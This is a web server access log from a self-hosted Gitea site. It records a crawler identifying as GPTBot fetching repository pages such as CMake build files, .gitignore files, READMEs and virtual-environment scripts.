"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15111] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15110] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md?display=rendered" [Client 74.7.227.38] [Length 15717] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:16:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15181] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15254] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15182] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:16:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=source" [Client 74.7.227.38] [Length 11395] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:16:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" +[17/Feb/2026:16:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" +[17/Feb/2026:16:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16832] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10239] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16831] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15435] [Gzip 8.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10240] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15367] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15368] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15366] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21441] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:16:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:16:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:16:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" +[17/Feb/2026:16:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" +[17/Feb/2026:16:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" +[17/Feb/2026:16:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" +[17/Feb/2026:16:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" +[17/Feb/2026:16:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" +[17/Feb/2026:16:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11794] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" +[17/Feb/2026:16:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11577] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:16:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:16:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11585] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:16:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" +[17/Feb/2026:16:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" +[17/Feb/2026:16:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" +[17/Feb/2026:16:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" +[17/Feb/2026:16:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" +[17/Feb/2026:16:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" +[17/Feb/2026:16:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 